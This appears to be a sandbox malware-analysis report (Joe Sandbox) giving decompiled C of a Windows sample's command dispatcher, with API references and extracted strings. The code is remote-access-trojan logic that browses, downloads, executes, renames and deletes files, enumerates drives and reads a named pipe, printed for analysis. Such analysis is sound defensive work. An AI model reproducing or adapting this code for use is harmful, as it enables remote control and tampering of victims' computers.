                    				int _t210;
                    				int _t213;
                    				void* _t229;
                    				int _t231;
                    				long _t237;
                    				int _t240;
                    				void* _t254;
                    				signed int _t256;
                    				void* _t267;
                    				char* _t269;
                    				void* _t270;
                    				void* _t281;
                    				void* _t297;
                    				void* _t307;
                    				void* _t324;
                    				void* _t325;
                    				void* _t338;
                    				void* _t345;
                    				void* _t349;
                    				int _t350;
                    				void* _t354;
                    				void* _t365;
                    				signed int _t379;
                    				void* _t383;
                    				void* _t388;
                    				void* _t398;
                    				int _t465;
                    				void* _t614;
                    				void* _t617;
                    				short* _t640;
                    				intOrPtr _t650;
                    				intOrPtr _t651;
                    				int _t652;
                    				int _t654;
                    				int _t656;
                    				int _t657;
                    				int _t658;
                    				int _t659;
                    				void* _t662;
                    				void* _t664;
                    				void* _t666;
                    				void* _t668;
                    				void* _t669;
                    				void* _t670;
                    				void* _t673;
                    				void* _t674;
                    				signed int _t675;
                    				void* _t678;
                    				void* _t679;
                    				void* _t680;
                    				void* _t683;
                    				void* _t684;
                    				void* _t685;
                    				void* _t686;
                    				void* _t688;
                    				void* _t689;
                    				void* _t690;
                    				void* _t699;
                    				void* _t700;
                    				void* _t718;
                    				void* _t719;
                    				void* _t720;
                    				void* _t722;
                    				void* _t724;
                    				void* _t732;
                    				void* _t733;
                    				void* _t734;
                    				void* _t735;
                    				void* _t736;
                    				void* _t738;
                    				signed int _t747;
                    
                    				_t737 = __eflags;
                    				_t629 = __edx;
                    				_push(0);
                    				_t650 = _a4;
                    				E004020F6(0,  &_v444, __edx, __eflags, _t650 + 0xc);
                    				SetEvent( *(_t650 + 0x24));
                    				_t651 =  *((intOrPtr*)(E00401FAB( &_v448)));
                    				E004041A2( &_v448,  &_v424, 4, 0xffffffff);
                    				_t678 = (_t675 & 0xfffffff8) - 0x20c;
                    				E004020F6(0, _t678, _t629, _t737, 0x473ec8);
                    				_t679 = _t678 - 0x18;
                    				E004020F6(0, _t679, _t629, _t737,  &_v440);
                    				E0041B8B0( &_v576, _t629);
                    				_t680 = _t679 + 0x30;
                    				_t738 = _t651 - 0x8d;
                    				if(_t738 > 0) {
                    					_t652 = _t651 - 0x8e;
                    					__eflags = _t652;
                    					if(_t652 == 0) {
                    						__eflags = 0;
                    						E0040417E(0,  &_v544, _t629, _t674, E00401FAB(E00401E65( &_v552, _t629, _t674, 0, 0)));
                    						_t166 = E00401FAB(E00401E65( &_v560, _t629, _t674, __eflags, 1));
                    						_t629 =  &_v552;
                    						CreateDirectoryW(E00401F04(E00409082( &_v480,  &_v552, _t674, _t166)), 0);
                    						E00401F09();
                    						E0040324F(0x2a);
                    						E00408F83(0, _t680 - 0x18,  &_v552, __eflags,  &_v556);
                    						goto L57;
                    					} else {
                    						_t654 = _t652 - 3;
                    						__eflags = _t654;
                    						if(__eflags == 0) {
                    							_t182 = StrToIntA(E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 0)));
                    							_t629 = E00401FAB(E00401E65( &_v556, _t629, _t674, __eflags, 1));
                    							E0041C477(_t182, _t184);
                    						} else {
                    							_t656 = _t654 - 0x24;
                    							__eflags = _t656;
                    							if(__eflags == 0) {
                    								 *0x471b18 = 0;
                    								_t186 = E00401E65( &_v552, _t629, _t674, __eflags, 2);
                    								_t683 = _t680 - 0x18;
                    								E004020F6(0, _t683, _t629, __eflags, _t186);
                    								_t684 = _t683 - 0x18;
                    								E0040417E(0, _t684, _t629, _t674, 0x46b928);
                    								_t190 = E00401FAB(E00401E65( &_v564, _t629, _t674, __eflags, 0));
                    								_t685 = _t684 - 0x18;
                    								E0040417E(0, _t685, _t629, _t674, _t190);
                    								E00401E65( &_v572, _t629, _t674, __eflags, 1);
                    								E00408733(E0041B881(__eflags), _t629, __eflags);
                    								_t686 = _t685 + 0x48;
                    								__eflags =  *0x471b18; // 0x0
                    								if(__eflags == 0) {
                    									Sleep(0x7d0);
                    									E004020F6(0, _t686 - 0x18, _t629, __eflags, E00401E65( &_v552, _t629, _t674, __eflags, 0));
                    									_push(0xb9);
                    									goto L54;
                    								}
                    							} else {
                    								_t657 = _t656 - 3;
                    								__eflags = _t657;
                    								if(_t657 == 0) {
                    									 *0x471b18 = 1;
                    								} else {
                    									_t658 = _t657 - 0xa;
                    									__eflags = _t658;
                    									if(__eflags == 0) {
                    										_t198 = E00401E65( &_v552, _t629, _t674, __eflags, 2);
                    										_t688 = _t680 - 0x18;
                    										E004020F6(0, _t688, _t629, __eflags, _t198);
                    										_t200 = E00407B1B(_t674);
                    										_t689 = _t688 + 0x18;
                    										__eflags = _t200;
                    										if(_t200 != 0) {
                    											E004368A0(0x473ec8,  &_v268, 0, 0x104);
                    											_t690 = _t689 + 0xc;
                    											 *0x471b20(E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 0)),  &_v268);
                    											_t210 = E0043B4A1(_t207, E00401FAB(E00401E65( &_v556, _t629, _t674, __eflags, 1)));
                    											__eflags = _t210;
                    											if(__eflags == 0) {
                    												_t691 = _t690 - 0x18;
                    												goto L50;
                    											} else {
                    												_t213 = _t210 - 1;
                    												__eflags = _t213;
                    												if(__eflags == 0) {
                    													E00402093(0,  &_v516, _t629, _t674,  &_v268);
                    													E004020F6(0, _t690 - 0x18, _t629, __eflags, 0x474028);
                    													E0040417E(0, _t690, _t629, _t674, 0x46b928);
                    													_t629 =  &_v528;
                    													E0041B6F3(_t690 - 0xffffffffffffffe8,  &_v528);
                    													_t465 = 0;
                    													__eflags = 0;
                    													goto L48;
                    												} else {
                    													__eflags = _t213 - 1;
                    													if(__eflags == 0) {
                    														E00402093(0,  &_v516, _t629, _t674,  &_v268);
                    														E004020F6(0, _t690 - 0x18, _t629, __eflags, 0x474028);
                    														E0040417E(0, _t690, _t629, _t674, 0x46b928);
                    														_t629 =  &_v528;
                    														E0041B6F3(_t690 - 0xffffffffffffffe8,  &_v528);
                    														_t465 = 1;
                    														L48:
                    														E004089AC(_t465, _t629, 0x473ec8);
                    														E00401FD8();
                    														DeleteFileA( &_v268);
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										_t659 = _t658 - 1;
                    										__eflags = _t659;
                    										if(__eflags == 0) {
                    											_t229 = E00401E65( &_v552, _t629, _t674, __eflags, 1);
                    											_t699 = _t680 - 0x18;
                    											E004020F6(0, _t699, _t629, __eflags, _t229);
                    											_t231 = E00407B1B(_t674);
                    											_t700 = _t699 + 0x18;
                    											__eflags = _t231;
                    											if(__eflags != 0) {
                    												 *0x471b1c(E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 0)));
                    												_t691 = _t700 - 0x14;
                    												L50:
                    												E00408F83(0, _t691, _t629, __eflags, 0x474010);
                    												E00407763(_t629);
                    												goto L27;
                    											}
                    										} else {
                    											_t660 = _t659 - 4;
                    											__eflags = _t659 - 4;
                    											if(__eflags == 0) {
                    												_t237 = E0043B4A1(_t235, E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 1)));
                    												_t240 = SetFileAttributesW(E00401FAB(E00401E65( &_v556, _t629, _t674, __eflags, _t660)), _t237);
                    												__eflags = _t240;
                    												E0041B88B(_t680 - 0x18, _t629);
                    												_push(0xc7);
                    												L54:
                    												E00404AA1(0x474040, _t629, __eflags);
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					if(_t738 == 0) {
                    						E0040417E(0,  &_v544, _t629, _t674, E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 0)));
                    						E0040417E(0,  &_v528, _t629, _t674, E00401FAB(E00401E65( &_v560, _t629, _t674, __eflags, 1)));
                    						E00408F35( &_v564,  &_v516, 0, E00408F4F( &_v556,  &_v528,  &_v528) + 1);
                    						_t254 = E00401F04(E00409108( &_v504,  &_v528, _t674,  &_v552));
                    						_t256 = E0043F302(E00401F04( &_v576), _t254);
                    						asm("sbb bl, bl");
                    						E00401F09();
                    						_t408 =  ~_t256 + 1;
                    						__eflags =  ~_t256 + 1;
                    						if( ~_t256 + 1 == 0) {
                    							_t629 = E0040531E( &_v468, "Unable to rename file!", _t674, 0x473ec8);
                    							E00406383(_t408, _t680 - 0x18, _t258, 0x473ec8, _t674, __eflags, "16");
                    							_push(0x59);
                    							E00404AA1(0x474040, _t258, __eflags);
                    							E00401FD8();
                    						} else {
                    							_t629 =  &_v492;
                    							E00409082(_t680 - 0x18,  &_v492, _t674, "*");
                    							E00407763( &_v492);
                    						}
                    						E00401F09();
                    						E00401F09();
                    						goto L58;
                    					} else {
                    						_t662 = _t651 - 0x61;
                    						if(_t662 == 0) {
                    							_t267 = E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 0));
                    							_t691 = _t680 - 0x18;
                    							E0040417E(0, _t680 - 0x18, _t629, _t674, _t267);
                    							_t269 = E00401E65( &_v560, _t629, _t674, __eflags, 2);
                    							_t270 = E00401E65( &_v564, _t629, _t674, __eflags, 1);
                    							_t629 = _t269;
                    							E0041AADC(_t270, _t269);
                    							L27:
                    						} else {
                    							_t664 = _t662 - 0x26;
                    							if(_t664 == 0) {
                    								GetLogicalDriveStringsA(0x64,  &_v396);
                    								E004020B7(0,  &_v540, _t629, _t674, __eflags,  &_v396, 0x64);
                    								__eflags = E00406AA3( &_v548, 0x465538, 0, 2) + 1;
                    								E00401F9D(E00406AA3( &_v548, 0x465538, 0, 2) + 1);
                    								E004020F6(0, _t680 - 0x18, _t629, E00406AA3( &_v548, 0x465538, 0, 2) + 1,  &_v564);
                    								_t281 = E004079D4(0,  &_v544, _t629);
                    								_t629 = E00402F31( &_v496,  &_v568, _t674, 0x473ec8);
                    								E00402EA1(_t680 - 0x18, _t282, _t281);
                    								_push(0x51);
                    								E00404AA1(0x474040, _t282, __eflags);
                    								E00401FD8();
                    								E00401FD8();
                    								goto L25;
                    							} else {
                    								_t666 = _t664 - 1;
                    								if(_t666 == 0) {
                    									L00408F7E(0, 0x474010, _t629, E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 0)));
                    									E00408F83(0, _t680 - 0x18, _t629, __eflags, 0x474010);
                    									E00407763(_t629);
                    									_t297 = E0041B753( &_v492, E00408F35(0x474010,  &_v528, 0, E0040247C() - 2));
                    									_t629 = "Browsing directory: ";
                    									E004052FD(0, _t680 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t674, __eflags, _t297);
                    									E00402093(0, _t680 - 0x18 + 0x18 - 4, "Browsing directory: ", _t674, "i");
                    									E0041AF84(0, 0x473ec8);
                    									E00401FD8();
                    									goto L59;
                    								} else {
                    									_t668 = _t666 - 1;
                    									if(_t668 == 0) {
                    										E0040417E(0,  &_v544, _t629, _t674, E00401FAB(E00401E65( &_v552, _t629, _t674, __eflags, 0)));
                    										ShellExecuteW(0, L"open", E00401F04( &_v548), 0, 0, 1);
                    										_t307 = E0041B753( &_v476,  &_v548);
                    										_t629 = "Executing file: ";
                    										E004052FD(0, _t680 - 0x18, "Executing file: ", _t674, __eflags, _t307);
                    										E00402093(0, _t680 - 4, "Executing file: ", _t674, "i");
                    										E0041AF84(0, 0x473ec8);
                    										E00401FD8();
                    										goto L58;
                    									} else {
                    										_t669 = _t668 - 1;
                    										if(_t669 == 0) {
                    											 *0x471b18 = 0;
                    											E004020F6(0, _t680 - 0x18, _t629, __eflags, E00401E65( &_v552, _t629, _t674, __eflags, 2));
                    											E0040417E(0, _t680, _t629, _t674, 0x46b928);
                    											E0040417E(0, _t680 - 0xffffffffffffffe8, _t629, _t674, E00401FAB(E00401E65( &_v564, _t629, _t674, __eflags, 0)));
                    											E00401E65( &_v572, _t629, _t674, __eflags, 1);
                    											E004089AC(E0041B881(__eflags), _t629, 0x473ec8);
                    										} else {
                    											_t670 = _t669 - 1;
                    											if(_t670 == 0) {
                    												 *0x471b18 = 0;
                    												E004020DF(0,  &_v468);
                    												E004046F7( &_v396, _t674, 1);
                    												E004048C8( &_v400, _t670,  &_v396);
                    												_t324 = E00401E65( &_v560, _t629, _t674, __eflags, 3);
                    												_t718 = _t680 - 0x18;
                    												_t325 = E00401E65( &_v564, _t629, _t674, __eflags, 2);
                    												E00402F10(0, _t718, E00402F10(0,  &_v536, E00402F10(0,  &_v512, E00402F31( &_v560, E00401E65( &_v568, _t629, _t674, __eflags, 1), _t674, 0x473ec8), _t674, __eflags, _t325), _t674, __eflags, 0x473ec8), _t674, __eflags, _t324);
                    												_push(0x56);
                    												E00404AA1( &_v416, _t329, __eflags);
                    												E00401FD8();
                    												E00401FD8();
                    												E00401FD8();
                    												E0040417E(0,  &_v544, _t329, _t674, E00401FAB(E00401E65( &_v600, _t329, _t674, __eflags, 0)));
                    												_t338 = E0041B753( &_v572,  &_v548);
                    												_t719 = _t718 - 0x18;
                    												_t640 = "Downloading file: ";
                    												E004052FD(0, _t719, _t640, _t674, __eflags, _t338);
                    												_t720 = _t719 - 0x14;
                    												_t672 = "i";
                    												E00402093(0, _t720, _t640, _t674, "i");
                    												E0041AF84(0, 0x473ec8);
                    												E00401FD8();
                    												E00401F09();
                    												_t345 = E00401FAB(E00401E65( &_v612, _t640, _t674, __eflags, 0));
                    												_t722 = _t720 + 0x30 - 0x18;
                    												E0040417E(0, _t722, _t640, _t674, _t345);
                    												_t349 = E0043F252(_t347, E00401FAB(E00401E65( &_v620, _t640, _t674, __eflags, 4)), 0, 0xa);
                    												_push(_t640);
                    												_push(_t349);
                    												_t350 = E0040788A( &_v468, __eflags);
                    												_t724 = _t722 + 0x2c;
                    												_push(0);
                    												__eflags = _t350;
                    												if(__eflags == 0) {
                    													E0040417E(0,  &_v516, _t640, _t674, E00401FAB(E00401E65( &_v624, _t640, _t674, __eflags)));
                    													_t354 = E0041B753( &_v544,  &_v520);
                    													_t629 = "Failed to download file: ";
                    													E004052FD(0, _t724 - 0x18, "Failed to download file: ", _t674, __eflags, _t354);
                    													E00402093(0, _t724 - 4, "Failed to download file: ", _t674, "E");
                    													E0041AF84(0, 0x473ec8);
                    													E00401FD8();
                    													E00401F09();
                    												} else {
                    													E0040417E(0,  &_v516, _t640, _t674, E00401FAB(E00401E65( &_v624, _t640, _t674, __eflags)));
                    													_t365 = E0041B753( &_v544,  &_v520);
                    													_t629 = "Downloaded file: ";
                    													E004052FD(0, _t724 - 0x18, "Downloaded file: ", _t674, __eflags, _t365);
                    													E00402093(0, _t724 - 4, "Downloaded file: ", _t674, "i");
                    													E0041AF84(0, 0x473ec8);
                    													E00401FD8();
                    													E00401F09();
                    													E00402093(0, _t724 - 4 + 0x30 - 0x18, "Downloaded file: ", _t674, 0x465094);
                    													_push(0x58);
                    													E00404AA1( &_v432, "Downloaded file: ", __eflags);
                    												}
                    												E00404E26(_t629);
                    												E00404EE2(0,  &_v416, _t629, _t672);
                    												L25:
                    												E00401FD8();
                    											} else {
                    												_t673 = _t670 - 1;
                    												_t745 = _t673;
                    												if(_t673 == 0) {
                    													E0040417E(0,  &_v544, _t629, _t674, E00401FAB(E00401E65( &_v552, _t629, _t674, _t745, _t673)));
                    													if((GetFileAttributesW(E00401F04( &_v548)) & 0x00000010) == 0) {
                    														_t379 = DeleteFileW(E00401F04( &_v548));
                    													} else {
                    														_t379 = E0041BD26(E00401F04( &_v548), _t629);
                    													}
                    													_t747 = _t379;
                    													_t748 = _t379 & 0xffffff00 | _t747 != 0x00000000;
                    													if((_t379 & 0xffffff00 | _t747 != 0x00000000) == 0) {
                    														_t732 = _t680 - 0x18;
                    														E0041B7B3(0, _t732,  &_v540);
                    														_push(0x55);
                    														E00404AA1(0x474040,  &_v540, __eflags);
                    														_t383 = E0041B753( &_v544,  &_v568);
                    														_t733 = _t732 - 0x18;
                    														_t645 = "Unable to delete: ";
                    														E004052FD(0, _t733, "Unable to delete: ", _t674, __eflags, _t383);
                    														_t734 = _t733 - 0x14;
                    														_t614 = _t734;
                    														_push("E");
                    													} else {
                    														_t398 = E0041B753( &_v516,  &_v540);
                    														_t736 = _t680 - 0x18;
                    														_t645 = "Deleted file: ";
                    														E004052FD(0, _t736, "Deleted file: ", _t674, _t748, _t398);
                    														_t734 = _t736 - 0x14;
                    														_t614 = _t734;
                    														_push("i");
                    													}
                    													E00402093(0, _t614, _t645, _t674);
                    													E0041AF84(0, 0x473ec8);
                    													_t735 = _t734 + 0x30;
                    													E00401FD8();
                    													_t388 = E00401E65( &_v576, _t645, _t674, _t748, 1);
                    													_t629 = "1";
                    													_t617 = _t388;
                    													if(E00405B05("1") != 0) {
                    														E00408F6B(E00408F4F( &_v560, _t617, _t617) + 1);
                    														_push(0x2a);
                    														_t629 =  &_v572;
                    														E00401F13( &_v572,  &_v572, _t673, E00402F72(0,  &_v548,  &_v572, _t674));
                    														E00401F09();
                    														E0040417E(0, _t735 - 0x18,  &_v572, _t674, E00401F04( &_v576));
                    														L57:
                    														E00407763(_t629);
                    													}
                    													L58:
                    													L59:
                    													E00401F09();
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				E00401E8D( &_v552, _t629);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}



























































































































                    0x00407bbe
                    0x00407bbe
                    0x00407bce
                    0x00407bd0
                    0x00407bd8
                    0x00407be0
                    0x00407bfa
                    0x00407c04
                    0x00407c09
                    0x00407c14
                    0x00407c19
                    0x00407c26
                    0x00407c2f
                    0x00407c39
                    0x00407c3c
                    0x00407c3e
                    0x00408381
                    0x00408381
                    0x00408387
                    0x00408689
                    0x004086a1
                    0x004086b4
                    0x004086ba
                    0x004086d0
                    0x004086da
                    0x004086e5
                    0x004086f4
                    0x00000000
                    0x0040838d
                    0x0040838d
                    0x0040838d
                    0x00408390
                    0x00408661
                    0x0040867b
                    0x0040867f
                    0x00408396
                    0x00408396
                    0x00408396
                    0x00408399
                    0x004085b1
                    0x004085b7
                    0x004085bc
                    0x004085c2
                    0x004085c7
                    0x004085d1
                    0x004085e2
                    0x004085e7
                    0x004085ed
                    0x004085f8
                    0x00408606
                    0x0040860b
                    0x0040860e
                    0x00408614
                    0x0040861f
                    0x00408635
                    0x0040863a
                    0x00000000
                    0x0040863a
                    0x0040839f
                    0x0040839f
                    0x0040839f
                    0x004083a2
                    0x0040859d
                    0x004083a8
                    0x004083a8
                    0x004083a8
                    0x004083ab
                    0x00408457
                    0x0040845c
                    0x00408462
                    0x00408467
                    0x0040846c
                    0x0040846f
                    0x00408471
                    0x00408487
                    0x0040848c
                    0x004084a9
                    0x004084ca
                    0x004084ca
                    0x004084cc
                    0x00408584
                    0x00000000
                    0x004084d2
                    0x004084d2
                    0x004084d2
                    0x004084d5
                    0x0040852d
                    0x0040853c
                    0x0040854b
                    0x00408553
                    0x00408559
                    0x0040855e
                    0x0040855e
                    0x00000000
                    0x004084d7
                    0x004084d7
                    0x004084da
                    0x004084ec
                    0x004084fb
                    0x0040850a
                    0x00408512
                    0x00408518
                    0x0040851d
                    0x00408560
                    0x00408560
                    0x0040856c
                    0x00408579
                    0x00408579
                    0x004084da
                    0x004084d5
                    0x004084cc
                    0x004083b1
                    0x004083b1
                    0x004083b1
                    0x004083b4
                    0x00408410
                    0x00408415
                    0x0040841b
                    0x00408420
                    0x00408425
                    0x00408428
                    0x0040842a
                    0x00408443
                    0x00408449
                    0x00408587
                    0x0040858e
                    0x00408593
                    0x00000000
                    0x00408593
                    0x004083b6
                    0x004083b6
                    0x004083b6
                    0x004083b9
                    0x004083d2
                    0x004083eb
                    0x004083f1
                    0x004083fb
                    0x00408400
                    0x0040863f
                    0x00408644
                    0x00408644
                    0x004083b9
                    0x004083b4
                    0x004083ab
                    0x004083a2
                    0x00408399
                    0x00408390
                    0x00407c44
                    0x00407c44
                    0x00408296
                    0x004082b2
                    0x004082ce
                    0x004082e8
                    0x004082f8
                    0x00408307
                    0x00408309
                    0x0040830e
                    0x0040830e
                    0x00408311
                    0x0040834b
                    0x0040834f
                    0x00408355
                    0x0040835c
                    0x00408365
                    0x00408313
                    0x00408316
                    0x00408321
                    0x00408327
                    0x0040832c
                    0x0040836e
                    0x00408377
                    0x00000000
                    0x00407c4a
                    0x00407c4a
                    0x00407c4d
                    0x00408245
                    0x0040824a
                    0x00408250
                    0x0040825b
                    0x00408268
                    0x0040826d
                    0x00408271
                    0x00408276
                    0x00407c53
                    0x00407c53
                    0x00407c56
                    0x0040819f
                    0x004081b3
                    0x004081ca
                    0x004081d0
                    0x004081df
                    0x004081e8
                    0x00408202
                    0x00408206
                    0x0040820c
                    0x00408213
                    0x0040821c
                    0x00408225
                    0x00000000
                    0x00407c5c
                    0x00407c5c
                    0x00407c5f
                    0x00408121
                    0x0040812c
                    0x00408131
                    0x00408157
                    0x0040815f
                    0x00408167
                    0x00408176
                    0x0040817b
                    0x00408187
                    0x00000000
                    0x00407c65
                    0x00407c65
                    0x00407c68
                    0x004080a5
                    0x004080be
                    0x004080cc
                    0x004080d4
                    0x004080dc
                    0x004080eb
                    0x004080f0
                    0x004080fc
                    0x00000000
                    0x00407c6e
                    0x00407c6e
                    0x00407c71
                    0x0040802b
                    0x0040803c
                    0x0040804b
                    0x00408067
                    0x00408072
                    0x00408080
                    0x00407c77
                    0x00407c77
                    0x00407c7a
                    0x00407dd2
                    0x00407dd8
                    0x00407de6
                    0x00407df3
                    0x00407dfe
                    0x00407e03
                    0x00407e10
                    0x00407e4a
                    0x00407e50
                    0x00407e59
                    0x00407e62
                    0x00407e6b
                    0x00407e74
                    0x00407e8f
                    0x00407e9c
                    0x00407ea1
                    0x00407ea4
                    0x00407eac
                    0x00407eb1
                    0x00407eb4
                    0x00407ebc
                    0x00407ec1
                    0x00407ecd
                    0x00407ed6
                    0x00407ee7
                    0x00407eec
                    0x00407ef2
                    0x00407f0d
                    0x00407f1c
                    0x00407f1d
                    0x00407f1e
                    0x00407f23
                    0x00407f2a
                    0x00407f2b
                    0x00407f2d
                    0x00407fb7
                    0x00407fc4
                    0x00407fcc
                    0x00407fd4
                    0x00407fe3
                    0x00407fe8
                    0x00407ff4
                    0x00407ffd
                    0x00407f2f
                    0x00407f40
                    0x00407f4d
                    0x00407f55
                    0x00407f5d
                    0x00407f68
                    0x00407f6d
                    0x00407f79
                    0x00407f82
                    0x00407f91
                    0x00407f96
                    0x00407f9f
                    0x00407f9f
                    0x00408009
                    0x00408015
                    0x0040822e
                    0x0040822e
                    0x00407c80
                    0x00407c80
                    0x00407c80
                    0x00407c83
                    0x00407c9f
                    0x00407cba
                    0x00407cd0
                    0x00407cbc
                    0x00407cc3
                    0x00407cc3
                    0x00407cd6
                    0x00407cdf
                    0x00407ce1
                    0x00407d08
                    0x00407d0d
                    0x00407d12
                    0x00407d19
                    0x00407d26
                    0x00407d2b
                    0x00407d2e
                    0x00407d36
                    0x00407d3b
                    0x00407d3e
                    0x00407d40
                    0x00407ce3
                    0x00407ce7
                    0x00407cec
                    0x00407cef
                    0x00407cf7
                    0x00407cfc
                    0x00407cff
                    0x00407d01
                    0x00407d01
                    0x00407d45
                    0x00407d4a
                    0x00407d4f
                    0x00407d56
                    0x00407d61
                    0x00407d66
                    0x00407d6b
                    0x00407d74
                    0x00407d8b
                    0x00407d90
                    0x00407d92
                    0x00407da5
                    0x00407dae
                    0x00407dc2
                    0x004086f9
                    0x004086f9
                    0x004086fe
                    0x00408701
                    0x00408705
                    0x00408705
                    0x00408705
                    0x00407c83
                    0x00407c7a
                    0x00407c71
                    0x00407c68
                    0x00407c5f
                    0x00407c56
                    0x00407c4d
                    0x00407c44
                    0x0040870e
                    0x0040871a
                    0x00408723
                    0x00408730

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 00407BE0
                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407CAE
                    • DeleteFileW.KERNEL32(00000000), ref: 00407CD0
                      • Part of subcall function 0041BD26: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BD81
                      • Part of subcall function 0041BD26: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BDB1
                      • Part of subcall function 0041BD26: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE06
                      • Part of subcall function 0041BD26: FindClose.KERNEL32(00000000,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE67
                      • Part of subcall function 0041BD26: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE6E
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,004045E6,?,?,00000004,?,?,00000004,0040D0AB,00000000,?), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,0040D0AB,00000000,?,?,?,?,?,?,004045E6), ref: 00404B75
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004080BE
                    • GetLogicalDriveStringsA.KERNEL32 ref: 0040819F
                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004083EB
                    • DeleteFileA.KERNEL32(?), ref: 00408579
                      • Part of subcall function 00408733: __EH_prolog.LIBCMT ref: 00408738
                      • Part of subcall function 00408733: FindFirstFileW.KERNEL32(00000000,?,004655F0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004087F1
                      • Part of subcall function 00408733: __CxxThrowException@8.LIBVCRUNTIME ref: 00408819
                      • Part of subcall function 00408733: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408826
                    • Sleep.KERNEL32(000007D0), ref: 0040861F
                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408661
                      • Part of subcall function 0041C477: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041C56C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                    • String ID: @@G$@@G$@@G$@@G$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                    • API String ID: 1067849700-87502134
                    • Opcode ID: 1bb550c567d877767ce2e76b910daf9e7cd6458214a961cb21ded3d22bcbc573
                    • Instruction ID: 399d4c8c92f976dc848dcdcaeb1e4c9af3eeb63bda704b11a00a3dee465313ca
                    • Opcode Fuzzy Hash: 1bb550c567d877767ce2e76b910daf9e7cd6458214a961cb21ded3d22bcbc573
                    • Instruction Fuzzy Hash: 8E428271A043016BC604FB76C95B9AE77A5AF90348F80093FF542671E2EF7C9909879B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040569A() {
                    				char _v4;
                    				void* _v16;
                    				char _v28;
                    				char _v52;
                    				long _v56;
                    				long _v60;
                    				CHAR* _v64;
                    				intOrPtr _v68;
                    				void* _v72;
                    				char _v76;
                    				CHAR* _v84;
                    				long _v92;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t52;
                    				void* _t56;
                    				void* _t66;
                    				void* _t70;
                    				void* _t79;
                    				CHAR* _t80;
                    				CHAR* _t97;
                    				void* _t105;
                    				intOrPtr _t135;
                    				signed int _t138;
                    				signed int _t139;
                    				long _t141;
                    				char* _t143;
                    				void* _t149;
                    				void* _t155;
                    				void* _t161;
                    				void* _t168;
                    
                    				_t149 =  &_v68;
                    				_t135 =  *((intOrPtr*)( *[fs:0x2c]));
                    				_t139 = _t138 | 0xffffffff;
                    				_t97 = 0;
                    				if( *0x475ca8 >  *((intOrPtr*)(_t135 + 4))) {
                    					E00433E04(0x475ca8);
                    					_t152 =  *0x475ca8 - _t139;
                    					if( *0x475ca8 == _t139) {
                    						E004046F7(0x475c08, 0x475ca8, 0);
                    						E0043418E(_t152, E004579A7);
                    						E00433DC5(_t139, 0x475ca8);
                    					}
                    				}
                    				if( *0x475c88 >  *((intOrPtr*)(_t135 + 4))) {
                    					E00433E04(0x475c88);
                    					_t154 =  *0x475c88 - _t139;
                    					if( *0x475c88 == _t139) {
                    						E004020DF(_t97, 0x475cb0);
                    						E0043418E(_t154, E0045799D);
                    						E00433DC5(_t139, 0x475c88);
                    					}
                    				}
                    				_t98 =  &_v52;
                    				E004020DF(_t97,  &_v52);
                    				_t143 = 0x473f78;
                    				_t136 = CloseHandle;
                    				_v64 = _t97;
                    				_t155 =  *0x471ae6 - _t97; // 0x0
                    				if(_t155 != 0) {
                    					L12:
                    					_v60 = _t97;
                    					PeekNamedPipe( *0x475c90, _t97, _t97, _t97,  &_v60, _t97);
                    					if(_v60 <= _t97) {
                    						_t149 = _t149 - 0x18;
                    						E00402093(_t97, _t149, _t134, _t143, 0x465094);
                    						_push(0x62);
                    						_t139 = E00404AA1(0x475c08, _t134, __eflags);
                    						goto L21;
                    					}
                    					_push(_v60);
                    					_t56 = E0043B715(_t98);
                    					_t144 = _t56;
                    					ReadFile( *0x475c90, _t56, _v60,  &_v56, _t97);
                    					if(_v56 <= _t97) {
                    						L19:
                    						L0043B710(_t144);
